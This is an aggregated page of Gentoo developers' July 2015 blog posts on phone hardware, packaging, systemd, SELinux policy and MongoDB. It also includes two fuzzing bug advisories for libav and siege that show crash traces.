Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
July 29, 2015, 04:06 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

July 27, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

One in every 600 websites has .git exposed
http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/

July 25, 2015
Doogee Y100 Pro (July 25, 2015, 23:37 UTC)

For a while, I have been looking for a replacement for my Nexus 4. I have been mostly pleased with it, but not completely. The two things that bothered me most were the lack of dual-SIM and (usable) LTE.

So I ordered a Doogee Valencia2 Y100 Pro at Gearbest when it was announced in June, which seemed to be almost the perfect device for my needs and at 119 USD quite inexpensive too.

Pre-ordering a phone from a Chinese manufacturer without any existing user reports is quite a risk. Occasionally, these phones turn out to be not working well and getting after-sales support or even updates can be difficult. I decided to take the plunge anyway.

Two very good reviews have been published on YouTube in the meantime. You may want to check them out:


My phone arrived two days ago, so here are my initial impressions:

The package contents

The phone came with a plastic hardcover and screen protector attached. In the box there was a charger and USB cable, headphones, a second screen protector and an instruction manual.

Gearbest also included a travel adaptor for the charger. Some assembly required.

 

Phone specs: Advertisement and reality

The advertised specs of the phone (5" 720p screen, MT6735 64-bit quad-core, 13 MP camera, 2200 mAh battery, etc.) sounded almost too good to be true for that price. Unfortunately, they turned out too good to be true.

The following table shows the advertised specs and the contrast to reality:
advertisedactualremarks
5" 1280x720 IPS capacitive 5-point touch screen5" 1280x720 IPS capacitive 5-point touch screen
Mediatek MT6735 64-bit, 1.0 GHzMediatek MT6735P, 1.0 GHz. Phone comes with 32 bit Android installedClock frequency was originally advertised as 1.3 GHz, but later changed without notice to 1.0 GHz. The MT6735P has a slower GPU than the MT6735.
2 GB RAM, 16 GB flash memory2 GB RAM, 16 GB flash memory
13 MP rear, 8 MP front camera13 MP and 8 MP are most likely only interpolated
2200 mAh battery1800 mAh batteryThere is a sticker on the battery which says 2200 mAh, but when you peel it off it reveals the manufacturer label which says 1800 mAh.
Weight: 151 g including batteryWeight: 159 g including batterypicture of phone on a kitchen scale

This kind of exaggeration appears to be common for phones in the Chinese domestic market. But some folks still need to learn that when doing business internationally, such trickery just hurts your reputation.

With that out of the way, let's take a closer look at the device:

CPU and Linux kernel

$ uname -a
Linux localhost 3.10.65+ #1 SMP PREEMPT Fri Jul 10 20:28:28 CST 2015 armv7l GNU/Linux
shell@Y100pro:/ $ cat /proc/cpuinfo                                        
Processor : ARMv7 Processor rev 4 (v7l)
processor : 0
BogoMIPS : 32.39
Features : swp half thumb fastmult vfp edsp neon vfpv3 tls vfpv4 idiva idivt
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x0
CPU part : 0xd03
CPU revision : 4

Hardware : MT6735P
Revision : 0000
Serial : 0000000000000000

Camera


Although the rear camera appears to not have a 13 MP sensor (the YouTube reviewers above think it is more like 8 MP), it still manages to reach a quite acceptable picture quality.


Comparing day and night shots

HDR off / HDR on

Performance

As you can expect, the MT6735P does not particularly shine in benchmarks. The UI however feels snappy and smooth, and web browsing is fine even on complex websites.


Interim conclusion

Despite the exaggerated (you could also say, dishonest) advertisement, I am satisfied with the Doogee Y100 Pro. You can't really expect more for the price.

What next?

Next I will try to get a Gentoo Prefix up on the device. I will post an update then.

Sebastian Pipping a.k.a. sping (homepage, bugs)

I ran into this on Twitter, found it a very interesting read.

Hacking Team: a zero-day market case study

July 23, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Tasty calamares in Gentoo (July 23, 2015, 20:36 UTC)

First of all it’s nothing to eat. So what is it then? This is the introduction by upstream:

Calamares is an installer framework. By design it is very customizable, in order to satisfy a wide variety of needs and use cases. Calamares aims to be easy, usable, beautiful, pragmatic, inclusive and distribution-agnostic. Calamares includes an advanced partitioning feature, with support for both manual and automated partitioning operations. It is the first installer with an automated “Replace Partition” option, which makes it easy to reuse a partition over and over for distribution testing. Got a Linux distribution but no system installer? Grab Calamares, mix and match any number of Calamares modules (or write your own in Python or C++), throw together some branding, package it up and you are ready to ship!

I have just added newest release version (1.1.2) to the tree and in my dev overlay a live version (9999). The underlaying technology stack is mainly Qt5, KDE Frameworks, Python3, YAML and systemd. It’s picked up and of course in evaluation process by several Linux distributions.

You may asking why i have added it to Gentoo then where we have OpenRC as default init system?! You are right at the moment it is not very useful for Gentoo. But for example Sabayon as a downstream of us will (maybe) use it for the next releases, so in the first place it is just a service for our downstreams.

The second reason, there is a discussion on gentoo-dev mailing list at the moment to reboot the Gentoo installer. Instead of creating yet another installer implementation, we have two potential ways to pick it up, which are not mutual exclusive:

1. Write modules to make it work with sysvinit aka OpenRC
2. Solve Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

Have fun!

[1] https://calamares.io/about/
[2] johu dev overlay
[3] gentoo-dev ml – Rebooting the Installer Project
[4] Bug #482702 – Provide alternative stage3 tarballs using sys-apps/systemd

July 22, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

2015-07-22-194644_1047x779_scrot

These are the slides of my EuroPython 2015 talk.

The source code and ansible playbooks are available on github !

July 20, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Since updating to VMware Workstation 11 (from the Gentoo vmware overlay), I've experienced a lot of hangs of my KDE environment whenever a virtual machine was running. Basically my system became unusable, which is bad if your workflow depends on accessing both Linux and (gasp!) Windows 7 (as guest). I first suspected a dbus timeout (doing the "stopwatch test" for 25s waits), but it seems according to some reports that this might be caused by buggy behavior in kwin (4.11.21). Sadly I haven't been able to pinpoint a specific bug report.

Now, I'm not sure if the problem is really 100% fixed, but at least now the lags are much smaller- and here's how to do it (kudos to matthewls and vrenn): 

  • Add to /etc/xorg.conf in the Device section
    Option "TripleBuffer" "True"
  • Create a file in /etc/profile.d with content
    __GL_YIELD="USLEEP"
    (yes that starts with a double underscore).
  • Log out, stop your display manager, restart it.
I'll leave it as an exercise to the reader to figure out what these settings do. (Feel free to explain it in a comment. :) No guarantees of any kind. If this kills kittens you have been warned. Cheers.

July 18, 2015
Richard Freeman a.k.a. rich0 (homepage, bugs)
Running cron jobs as units automatically (July 18, 2015, 16:00 UTC)

I just added sys-process/systemd-cron to the Gentoo repository.  Until now I’ve been running it from my overlay and getting it into the tree was overdue.  I’ve found it to be an incredibly useful tool.

All it does is install a set of unit files and a crontab generator.  The unit files (best used by starting/enabling cron.target) will run jobs from /etc/cron.* at the appropriate times.  The generator can parse /etc/crontab and create timer units for every line dynamically.

Note that the default Gentoo install runs the /etc/cron.* jobs from /etc/crontab, so if you aren’t careful you might end up running them twice.  The simplest solutions this are to either remove those lines from /etc/crontab, or install systemd-cron using USE=etc-crontab-systemd which will have the generator ignore /etc/crontab and instead look for /etc/crontab-systemd where you can install jobs you’d like to run using systemd.

The generator works like you’d expect it to – if you edit the crontab file the units will automatically be created/destroyed dynamically.

One warning about timer units compared to cron jobs is that the jobs are run as services, which means that when the main process dies all its children will be killed.  If you have anything in /etc/cron.* which forks you’ll need to have the main script wait at the end.

On the topic of race conditions, each cron.* directory and each /etc/crontab line will create a separate unit.  Those units will all run in parallel (to the extent that one is still running when the next starts), but within a cron.* directory the scripts will run in series.  That may be a bit different from some cron implementations which may limit the number of simultaneous jobs globally.

All the usual timer unit logic applies.  stdout goes to the journal, systemctl list-timers shows what is scheduled, etc.


Filed under: gentoo, linux, systemd

July 17, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
OpenLDAP upgrade trap (July 17, 2015, 03:29 UTC)

After spending a few hours trying to figure out why OpenLDAP 2.4 did not want to return any results while 2.3 worked so nicely ...

The following addition to the slapd config file Makes Things Work (tm) - I have no idea if this is actually correct, but now things don't fail.

access to dn.base="dc=example,dc=com"
    by anonymous search
    by * none
I didn't notice this change in search behaviour in any of the Changelog, Upgrade docs or other documentation - so this is quite 'funny', but not really nice.

July 16, 2015

Description:
Libav is an open source set of tools for audio and video processing.

After talking with Luca Barbato which is both a Gentoo and Libav developer, I spent a bit of my time fuzzing libav and in particular I fuzzed libavcodec though avplay.
I hit a crash and after I reported it to upstream, they confirmed the issue as a divide-by-zero.

The complete gdb output:

ago@willoughby $ gdb --args /usr/bin/avplay avplay.crash 
GNU gdb (Gentoo 7.7.1 p1) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
.
Find the GDB manual and other documentation resources online at:
.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/avplay...Reading symbols from /usr/lib64/debug//usr/bin/avplay.debug...done.
done.
(gdb) run
Starting program: /usr/bin/avplay avplay.crash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need "set solib-search-path" or "set sysroot"?
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
avplay version 11.3, Copyright (c) 2003-2014 the Libav developers
  built on Jun 19 2015 09:50:59 with gcc 4.8.4 (Gentoo 4.8.4 p1.6, pie-0.6.1)
[New Thread 0x7fffec4c7700 (LWP 7016)]
[New Thread 0x7fffeb166700 (LWP 7017)]
INFO: AddressSanitizer ignores mlock/mlockall/munlock/munlockall
[New Thread 0x7fffe9e28700 (LWP 7018)]
[h263 @ 0x60480000f680] Format detected only with low score of 25, misdetection possible!
[h263 @ 0x60440001f980] Syntax-based Arithmetic Coding (SAC) not supported
[h263 @ 0x60440001f980] Reference Picture Selection not supported
[h263 @ 0x60440001f980] Independent Segment Decoding not supported
[h263 @ 0x60440001f980] header damaged

Program received signal SIGFPE, Arithmetic exception.
[Switching to Thread 0x7fffe9e28700 (LWP 7018)]
0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
142     /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c: No such file or directory.
(gdb) bt
#0  0x00007ffff21e3313 in ff_h263_decode_mba (s=s@entry=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:142
#1  0x00007ffff21f3c2d in ff_h263_decode_picture_header (s=0x60720005a100) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/ituh263dec.c:1112
#2  0x00007ffff1ae16ed in ff_h263_decode_frame (avctx=0x60440001f980, data=0x60380002f480, got_frame=0x7fffe9e272f0, avpkt=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/h263dec.c:444
#3  0x00007ffff2cd963e in avcodec_decode_video2 (avctx=0x60440001f980, picture=0x60380002f480, got_picture_ptr=got_picture_ptr@entry=0x7fffe9e272f0, avpkt=avpkt@entry=0x7fffe9e273b0) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavcodec/utils.c:1600
#4  0x00007ffff44d4fb4 in try_decode_frame (st=st@entry=0x60340002fb00, avpkt=avpkt@entry=0x601c00037b00, options=) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:1910
#5  0x00007ffff44ebd89 in avformat_find_stream_info (ic=0x60480000f680, options=0x600a00009e80) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/libavformat/utils.c:2276
#6  0x0000000000431834 in decode_thread (arg=0x7ffff7e0b800) at /tmp/portage/media-video/libav-11.3/work/libav-11.3/avplay.c:2268
#7  0x00007ffff0284b08 in ?? () from /usr/lib64/libSDL-1.2.so.0
#8  0x00007ffff02b4be9 in ?? () from /usr/lib64/libSDL-1.2.so.0
#9  0x00007ffff4e65aa8 in ?? () from /usr/lib/gcc/x86_64-pc-linux-gnu/4.8.4/libasan.so.0
#10 0x00007ffff0062204 in start_thread () from /lib64/libpthread.so.0
#11 0x00007fffefda957d in clone () from /lib64/libc.so.6
(gdb)

Affected version:
11.3 (and maybe past versions)

Fixed version:
11.5 and 12.0

Commit fix:
https://git.libav.org/?p=libav.git;a=commitdiff;h=0a49a62f998747cfa564d98d36a459fe70d3299b;hp=6f4cd33efb5a9ec75db1677d5f7846c60337129f

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2015-5479

Timeline:
2015-06-21: bug discovered
2015-06-22: bug reported privately to upstream
2015-06-30: upstream commit the fix
2015-07-14: CVE assigned
2015-07-16: advisory release

Note:
This bug was found with American Fuzzy Lop.
This bug does not affect ffmpeg.

Permalink:
http://blogs.gentoo.org/ago/2015/07/16/libav-divide-by-zero-in-ff_h263_decode_mba

July 15, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Loading CIL modules directly (July 15, 2015, 13:54 UTC)

In a previous post I used the secilc binary to load an additional test policy. Little did I know (and that’s actually embarrassing because it was one of the things I complained about) that you can just use the CIL policy as modules directly.

With this I mean that a CIL policy as mentioned in the previous post can be loaded like a prebuilt .pp module:

~# semodule -i test.cil
~# semodule -l | grep test
test

That’s all that is to it. Loading the module resulted in the test port to be immediately declared and available:

~# semanage port -l | grep test
test_port_t                    tcp      1440

In hindsight, it makes sense that it is this easy. After all, support for the old-style policy language is done by converting it into CIL when calling semodule so it makes sense to immediately put the module (in CIL code) ready to be taken up.

July 14, 2015
siege: off-by-one in load_conf() (July 14, 2015, 19:04 UTC)

Description:
Siege is an http load testing and benchmarking utility.

During the test of a webserver, I hit a segmentation fault. I recompiled siege with ASan and it clearly show an off-by-one in load_conf(). The issue is reproducible without passing any arguments to the binary.
The complete output:

ago@willoughby ~ # siege
=================================================================
==488==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000d7f1 at pc 0x00000051ab64 bp 0x7ffcc3d19a70 sp 0x7ffcc3d19a68
READ of size 1 at 0x60200000d7f1 thread T0
#0 0x51ab63 in load_conf /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263:12
#1 0x515486 in init_config /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:96:7
#2 0x5217b9 in main /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/main.c:324:7
#3 0x7fb2b1b93aa4 in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/csu/libc-start.c:289
#4 0x439426 in _start (/usr/bin/siege+0x439426)

0x60200000d7f1 is located 0 bytes to the right of 1-byte region [0x60200000d7f0,0x60200000d7f1)
allocated by thread T0 here:
#0 0x4c03e2 in __interceptor_malloc /var/tmp/portage/sys-devel/llvm-3.6.1/work/llvm-3.6.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40:3
#1 0x7fb2b1bf31e9 in __strdup /var/tmp/portage/sys-libs/glibc-2.20-r2/work/glibc-2.20/string/strdup.c:42

SUMMARY: AddressSanitizer: heap-buffer-overflow /var/tmp/portage/app-benchmarks/siege-3.1.0/work/siege-3.1.0/src/init.c:263 load_conf
Shadow bytes around the buggy address:
0x0c047fff9aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9ae0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9af0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa[01]fa
0x0c047fff9b00: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd
0x0c047fff9b10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fff9b20: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9b30: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa
0x0c047fff9b40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==488==ABORTING

Affected version:
3.1.0 (and maybe past versions).

Fixed version:
Not available.

Commit fix:
Not available.

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
Not assigned.

Timeline:
2015-06-09: bug discovered
2015-06-10: bug reported privately to upstream
2015-07-13: no upstream response
2015-07-14: advisory release

Permalink:
http://blogs.gentoo.org/ago/2015/07/14/siege-off-by-one-in-load_conf

July 11, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Restricting even root access to a folder (July 11, 2015, 12:09 UTC)

In a comment Robert asked how to use SELinux to prevent even root access to a directory. The trivial solution would be not to assign an administrative role to the root account (which is definitely possible, but you want some way to gain administrative access otherwise ;-)

Restricting root is one of the commonly referred features of a MAC (Mandatory Access Control) system. With a well designed user management and sudo environment, it is fairly trivial – but if you need to start from the premise that a user has direct root access, it requires some thought to implement it correctly. The main “issue” is not that it is difficult to implement policy-wise, but that most users will start from a pre-existing policy (such as the reference policy) and build on top of that.

The use of a pre-existing policy means that some roles are already identified and privileges are already granted to users – often these higher privileged roles are assigned to the Linux root user as not to confuse users. But that does mean that restricting root access to a folder means that some additional countermeasures need to be implemented.

The policy

But first things first. Let’s look at a simple policy for restricting access to /etc/private:

policy_module(myprivate, 1.0)

type etc_private_t;
fs_associate(etc_private_t)

This simple policy introduces a type (etc_private_t) which is allowed to be used for files (it associates with a file system). Do not use the files_type() interface as this would assign a set of attributes that many user roles get read access on.

Now, it is not sufficient to have the type available. If we want to assign it to a type, someone or something needs to have the privileges to change the security context of a file and directory to this type. If we would just load this policy and try to do this from a privileged account, it would fail:

~# chcon -t etc_private_t /etc/private
chcon: failed to change context of '/etc/private' to 'system_u:object_r:etc_private_t:s0': Permission denied

With the following rule, the sysadm_t domain (which I use for system administration) is allowed to change the context to etc_private_t:

allow sysadm_t etc_private_t:{dir file} relabelto;

With this in place, the administrator can label resources as etc_private_t without having read access to these resources afterwards. Also, as long as there are no relabelfrom privileges assigned, the administrator cannot revert the context back to a type that he has read access to.

The countermeasures

But this policy is not sufficient. One way that administrators can easily access the resources is to disable SELinux controls (as in, put the system in permissive mode):

~# cat /etc/private/README
cat: /etc/private/README: Permission denied
~# setenforce 0
~# cat /etc/private/README
Hello World!

To prevent this, enable the secure_mode_policyload SELinux boolean:

~# setsebool secure_mode_policyload on

This will prevent any policy and SELinux state manipulation… including permissive mode, but also including loading additional SELinux policies or changing booleans. Definitely experiment with this setting without persisting (i.e. do not use -P in the above command yet) to make sure it is manageable for you.

Still, this isn’t sufficient. Don’t forget that the administrator is otherwise a full administrator – if he cannot access the /etc/private location directly, then he might be able to access it indirectly:

  • If the resource is on a non-critical file system, he can unmount the file system and remount it with a context= mount option. This will override the file-level contexts. Bind-mounting does not seem to allow overriding the context.
  • If the resource is on a file system that cannot be unmounted, the administrator can still reboot the system in a mode where he can access the file system regardless of SELinux controls (either through editing /etc/selinux/config or by booting with enforcing=0, etc.
  • The administrator can still access the block device files on which the resources are directly. Specialized tools can allow for extracting files and directories without actually (re)mounting the device.

A more extensive list of methods to potentially gain access to such resources is iterated in Limiting file access with SELinux alone.

This set of methods for gaining access is due to the administrative role already assigned by the existing policy. To further mitigate these risks with SELinux (although SELinux will never completely mitigate all risks) the roles assigned to the users need to be carefully revisited. If you grant people administrative access, but you don’t want them to be able to reboot the system, (re)mount file systems, access block devices, etc. then create a user role that does not have these privileges at all.

Creating such user roles does not require leaving behind the policy that is already active. Additional user domains can be created and granted to Linux accounts (including root). But in my experience, when you need to allow a user to log on as the “root” account directly, you probably need him to have true administrative privileges. Otherwise you’d work with personal accounts and a well-designed /etc/sudoers file.

July 10, 2015
Johannes Huber a.k.a. johu (homepage, bugs)
Plasma 5 and kdbus testing (July 10, 2015, 22:03 UTC)

Thanks to Mike Pagano who enabled kdbus support in Gentoo kernel sources almost 2 weeks ago. Which gives us the choice to test it. As described in Mikes blog post you will need to enable the use flags kdbus and experimental on sys-kernel/gentoo-sources and kdbus on sys-apps/systemd.

root # echo "sys-kernel/gentoo-sources kdbus experimental" >> /etc/portage/package.use/kdbus

If you are running >=sys-apps/systemd-221 kdbus is already enabled by default otherwise you have to enable it.

root # echo "sys-apps/systemd kdbus" >> /etc/portage/package.use/kdbus

Any packages affected by the change need to be rebuilt.

root # emerge -avuND @world

Enable kdbus option in kernel.

General setup --->
<*> kdbus interprocess communication

Build the kernel, install it and reboot. Now we can check if kdbus is enabled properly. systemd should automatically mask dbus.service and start systemd-bus-proxyd.service instead (Thanks to eliasp for the info).

root # systemctl status dbus
● dbus.service
Loaded: masked (/dev/null)
Active: inactive (dead)



root # systemctl status systemd-bus-proxyd
● systemd-bus-proxyd.service - Legacy D-Bus Protocol Compatibility Daemon
Loaded: loaded (/usr/lib64/systemd/system/systemd-bus-proxyd.service; static; vendor preset: enabled)
Active: active (running) since Fr 2015-07-10 22:42:16 CEST; 16min ago
Main PID: 317 (systemd-bus-pro)
CGroup: /system.slice/systemd-bus-proxyd.service
└─317 /usr/lib/systemd/systemd-bus-proxyd --address=kernel:path=/sys/fs/kdbus/0-system/bus

Plasma 5 starts fine here using sddm as login manager. On Plasma 4 you may be interested in Bug #553460.

Looking forward when Plasma 5 will get user session support.

Have fun!

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Important!

My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

For quite some time, I have tried to get links in Thunderbird to open automatically in Chrome or Chromium instead of defaulting to Firefox. Moreover, I have Chromium start in incognito mode by default, and I would like those links to do the same. This has been a problem for me since I don’t use a full desktop environment like KDE, GNOME, or even XFCE. As I’m really a minimalist, I only have my window manager (which is Openbox), and the applications that I use on a regular basis.

One thing I found, though, is that by using PCManFM as my file manager, I do have a few other related applications and utilities that help me customise my workspace and workflows. One such application is libfm-pref-apps, which allows for setting preferred applications. I found that I could do just what I wanted to do without mucking around with manually setting MIME types, writing custom hooks for Thunderbird, or any of that other mess.

Here’s how it was done:

  1. Execute /usr/bin/libfm-pref-apps from your terminal emulator of choice
  2. Under “Web Browser,” select “Customise” from the drop-down menu
  3. Select the “Custom Command Line” tab
  4. In the “Command line to execute” box, type /usr/bin/chromium --incognito --start-maximized %U
  5. In the “Application name” box, type “Chromium incognito” (or however else you would like to identify the application)

Voilà! After restarting Thunderbird, my links opened just like I wanted them to. The only modification that you might need to make is the “Command line to execute” portion. If you use the binary of Chrome instead of building the open-source Chromium browser, you would need to change it to the appropriate executable (and the path may be different for you, depending on your system and distribution). Also, in the command line that I have above, here are some notes about the switches used:

  • –incognito starts Chromium in incognito mode by default (that one should be obvious)
  • –start-maximized makes the browser window open in the full size of your screen
  • %U allows Chromium to accept a URL or list of URLs, and thus, opens the link that you clicked in Thunderbird

Under the hood, it seems like libfm-pref-apps is adding some associations in the ~/.config/mimeapps.list file. The relevant lines that I found were:

[Added Associations]
x-scheme-handler/http=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;
x-scheme-handler/https=userapp-chromium --incognito --start-maximized-8KZNYX.desktop;

Hope this information helps you get your links to open in your browser of choice (and with the command-line arguments that you want)!

Cheers,
Zach

July 09, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In our previous attempt to upgrade our production cluster to 3.0, we had to roll back from the WiredTiger engine on primary servers.

Since then, we switched back our whole cluster to 3.0 MMAPv1 which has brought us some better performances than 2.6 with no instability.

Production checklist

We decided to use this increase in performance to allow us some time to fulfil the entire production checklist from MongoDB, especially the migration to XFS. We’re slowly upgrading our servers kernels and resynchronising our data set after migrating from ext4 to XFS.

Ironically, the strong recommendation of XFS in the production checklist appeared 3 days after our failed attempt at WiredTiger… This is frustrating but gives some kind of hope.

I’ll keep on posting on our next steps and results.

Our hero WiredTiger Replica Set

While we were battling with our production cluster, we got a spontaneous major increase in the daily volumes from another platform which was running on a single Replica Set. This application is write intensive and very disk I/O bound. We were killing the disk I/O with almost a continuous 100% usage on the disk write queue.

Despite our frustration with WiredTiger so far, we decided to give it a chance considering that this time we were talking about a single Replica Set. We were very happy to see WiredTiger keep up to its promises with an almost shocking serenity.

Disk I/O went down dramatically, almost as if nothing was happening any more. Compression did magic on our disk usage and our application went Roarrr !

July 06, 2015
Zack Medico a.k.a. zmedico (homepage, bugs)

I’ve created a utility called tardelta (ebuild available) that people using containers may be interested in. Here’s the README:

It is possible to optimize docker containers such that multiple containers are based off of a single copy of a common base image. If containers are constructed from tarballs, then it can be useful to create a delta tarball which contains the differences between a base image and a derived image. The delta tarball can then be layered on top of the base image using a Dockerfile like the following:

FROM base
ADD delta.tar.xz /

Many different types of containers can thus be derived from a common base image, while sharing a single copy of the base image. This saves disk space, and can also reduce memory consumption since it avoids having duplicate copies of base image data in the kernel’s buffer cache.

July 05, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Intermediate policies (July 05, 2015, 16:17 UTC)

When developing SELinux policies for new software (or existing ones whose policies I don’t agree with) it is often more difficult to finish the policies so that they are broadly usable. When dealing with personal policies, having them “just work” is often sufficient. To make the policies reusable for distributions (or for the upstream project), a number of things are necessary:

  • Try structuring the policy using the style as suggested by refpolicy or Gentoo
  • Add the role interfaces that are most likely to be used or required, or which are in the current draft implemented differently
  • Refactor some of the policies to use refpolicy/Gentoo style interfaces
  • Remove the comments from the policies (as refpolicy does not want too verbose policies)
  • Change or update the file context definitions for default installations (rather than the custom installations I use)

This often takes quite some effort. Some of these changes (such as the style updates and commenting) are even counterproductive for me personally (in the sense that I don’t gain any value from doing so and would have to start maintaining two different policy files for the same policy), and necessary only for upstreaming policies. As a result, I often finish with policies that I just leave for me personally or somewhere on a public repository (like these Neo4J and Ceph policies), without any activities already scheduled to attempt to upstream those.

But not contributing the policies to a broader public means that the effort is not known, and other contributors might be struggling with creating policies for their favorite (or necessary) technologies. So the majority of policies that I write I still hope to eventually push them out. But I noticed that these last few steps for upstreaming (the ones mentioned above) might only take a few hours of work, but take me over 6 months (or more) to accomplish (as I often find other stuff more interesting to do).

I don’t know yet how to change the process to make it more interesting to use. However, I do have a couple of wishes that might make it easier for me, and perhaps others, to contribute:

  • Instead of reacting on contribution suggestions, work on a common repository together. Just like with a wiki, where we don’t aim for a 100% correct and well designed document from the start, we should use the strength of the community to continuously improve policies (and to allow multiple people to work on the same policy). Right now, policies are a one-man publication with a number of people commenting on the suggested changes and asking the one person to refactor or update the change himself.
  • Document the style guide properly, but don’t disallow contributions if they do not adhere to the style guide completely. Instead, merge and update. On successful wikis there are even people that update styles without content updates, and their help is greatly appreciated by the community.
  • If a naming convention is to be followed (which is the case with policies) make it clear. Too often the name of an interface is something that takes a few days of discussion. That’s not productive for policy development.
